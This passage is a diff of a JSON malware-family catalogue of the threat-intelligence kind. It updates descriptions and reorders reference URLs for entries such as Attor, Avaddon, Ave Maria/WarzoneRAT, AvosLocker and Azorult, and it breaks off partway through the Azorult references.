"https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://twitter.com/siri_urz/status/1437664046556274694?s=20" + "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/" ], "synonyms": [], "type": [] @@ -13680,19 +14312,19 @@ "value": "ATOMSILO" }, { - "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor’s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.", + "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor\u2019s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware\u2019s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor", - "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf", - "https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/", - "https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html", - "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", - "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami", - "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform", "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform/", - "https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/" + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf", + "https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html", + "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform", + "https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/", + "https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/", + "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", + "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", + "https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami" ], "synonyms": [], "type": [] @@ -13749,11 +14381,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", - "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/", - "https://twitter.com/malwrhunterteam/status/1001461507513880576", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", - "https://blog.morphisec.com/in2al5d-p3in4er" + "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/", + "https://blog.morphisec.com/in2al5d-p3in4er", + "https://twitter.com/malwrhunterteam/status/1001461507513880576", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [ "OneKeyLocker" @@ -13768,13 +14400,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora_stealer", - "https://d01a.github.io/aurora-stealer/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", "https://research.loginsoft.com/threat-research/aurora-the-dark-dawn-and-its-menacing-effects/", "https://research.openanalysis.net/in2al5dp3in4er/loader/analysis/sandbox/invalid%20printer/2023/04/23/in2al5dp3in4er.html", - "https://d01a.github.io/aurora-stealer-builder/", - "https://isc.sans.edu/diary/rss/29448", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-aurora-stealer", + "https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/", + "https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219", + "https://d01a.github.io/aurora-stealer/", "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/", - "https://blog.sekoia.io/bluefox-information-stealer-traffer-maas/" + "https://d01a.github.io/aurora-stealer-builder/", + "https://isc.sans.edu/diary/rss/29448" ], "synonyms": [], "type": [] @@ -13787,45 +14422,45 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.connectwise.com/resources/avaddon-profile", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://twitter.com/Securityinbits/status/1271065316903120902", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", - "https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/", - "https://twitter.com/dk_samper/status/1348560784285167617", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.swascan.com/it/avaddon-ransomware/", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://atos.net/en/lp/securitydive/avaddon-ransomware-analysis", "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://www.tgsoft.it/files/report/download.asp?id=568531345", + "https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/", + "https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/", + "https://twitter.com/dk_samper/status/1348560784285167617", + "https://www.connectwise.com/resources/avaddon-profile", + "https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://arxiv.org/pdf/2102.04796.pdf", - "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", - "https://www.mandiant.com/resources/chasing-avaddon-ransomware", - "https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/", - "https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/", - "https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/", - "https://www.tgsoft.it/files/report/download.asp?id=568531345", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://atos.net/en/lp/securitydive/avaddon-ransomware-analysis", - "https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", + "https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf", "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/", - "https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf" + "https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/", + "https://www.mandiant.com/resources/chasing-avaddon-ransomware", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://twitter.com/Securityinbits/status/1271065316903120902", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", + "https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.swascan.com/it/avaddon-ransomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/" ], "synonyms": [], "type": [] @@ -13851,8 +14486,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", - "https://twitter.com/malwrhunterteam/status/976925447043846145", - "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" + "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/", + "https://twitter.com/malwrhunterteam/status/976925447043846145" ], "synonyms": [], "type": [] @@ -13892,50 +14527,55 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria", - "https://www.youtube.com/watch?v=81fdvmGmRvM", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest", - "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", - "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1", - "https://www.youtube.com/watch?v=T0tdj1WDioM", - "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", - "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.youtube.com/watch?v=-G82xh9m4hc", - "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing", - "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware", - "https://blogs.blackberry.com/en/2021/12/threat-thursday-warzone-rat-breeds-a-litter-of-scriptkiddies", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw", - "https://www.huntress.com/blog/ave-maria-and-the-chambers-of-warzone-rat", - "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", - "https://reaqta.com/2019/04/ave_maria-malware-part1/", - "https://blog.morphisec.com/syk-crypter-discord", - "https://blog.yoroi.company/research/the-ave_maria-malware/", - "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://kienmanowar.wordpress.com/2023/03/25/quicknote-decrypting-the-c2-configuration-of-warzone-rat/", - "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique", + "https://exploitreversing.files.wordpress.com/2022/11/mas_6-1.pdf", + "https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/warzonerat/warzonerat_config_extraction.ipynb", "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA", - "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/", - "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery", + "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest", + "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://muha2xmad.github.io/malware-analysis/warzonerat/", "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html", - "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/", - "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/", + "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware", "https://asec.ahnlab.com/en/36629/", - "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/", - "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://blog.yoroi.company/research/the-ave_maria-malware/", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat", + "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique", + "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing", "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/", - "https://exploitreversing.files.wordpress.com/2022/11/mas_6-1.pdf" + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.youtube.com/watch?v=-G82xh9m4hc", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", + "https://www.youtube.com/watch?v=81fdvmGmRvM", + "https://blogs.blackberry.com/en/2021/12/threat-thursday-warzone-rat-breeds-a-litter-of-scriptkiddies", + "https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/", + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "https://blog.morphisec.com/syk-crypter-discord", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/", + "https://reaqta.com/2019/04/ave_maria-malware-part1/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://kienmanowar.wordpress.com/2023/03/25/quicknote-decrypting-the-c2-configuration-of-warzone-rat/", + "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/", + "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", + "https://www.huntress.com/blog/ave-maria-and-the-chambers-of-warzone-rat", + "https://www.youtube.com/watch?v=T0tdj1WDioM", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [ "AVE_MARIA", @@ -13954,21 +14594,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", "https://news.sophos.com/en-us/2021/12/22/avos-locker-remotely-accesses-boxes-even-running-in-safe-mode/", - "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", - "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", "https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf", - "https://www.ic3.gov/Media/News/2022/220318.pdf", - "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", - "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/", "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", + "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", + "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", + "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", + "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/", + "https://www.ic3.gov/Media/News/2022/220318.pdf", "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux", + "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/", "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen" ], "synonyms": [], @@ -13977,6 +14617,18 @@ "uuid": "8cee7a73-df5f-4ca3-ac52-b8a29a9b7414", "value": "AvosLocker" }, + { + "description": "Was previously wrongly tagged as PoweliksDropper, now looking for additional context.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avrecon" + ], + "synonyms": [], + "type": [] + }, + "uuid": "969d1054-b917-4fb8-b3f8-1e33926fdb65", + "value": "Unidentified 061 (Windows)" + }, { "description": "", "meta": { @@ -14020,8 +14672,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke", - "https://www.youtube.com/watch?v=FttiysUZmDw", - "https://snort.org/rule_docs/1-34217" + "https://snort.org/rule_docs/1-34217", + "https://www.youtube.com/watch?v=FttiysUZmDw" ], "synonyms": [], "type": [] @@ -14034,69 +14686,70 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", - "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html", - "https://isc.sans.edu/diary/25120", - "https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/", - "https://ke-la.com/information-stealers-a-new-landscape/", - "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", - "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/", - "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", - "https://community.riskiq.com/article/56e28880", - "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", - "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", - "https://asec.ahnlab.com/en/26517/", - "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/", - "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", - "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", - "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/", - "https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", - "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", - "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", - "https://unit42.paloaltonetworks.com/cybersquatting/", - "https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/", - "https://fr3d.hk/blog/gazorp-thieving-from-thieves", + "https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", - "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", - "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html", - "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", - "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", - "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", - "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/", - "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", - "https://community.riskiq.com/article/2a36a7d2/description", - "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", - "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://asec.ahnlab.com/en/26517/", + "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", + "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/", + "https://twitter.com/DrStache_/status/1227662001247268864", "https://www.splunk.com/en_us/blog/security/-applocker-rules-as-defense-evasion-complete-analysis.html", - "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/", - "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", - "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", - "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", - "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/", - "https://securelist.com/azorult-analysis-history/89922/", + "https://ke-la.com/information-stealers-a-new-landscape/", + "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", + "https://isc.sans.edu/diary/25120", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", + "https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + 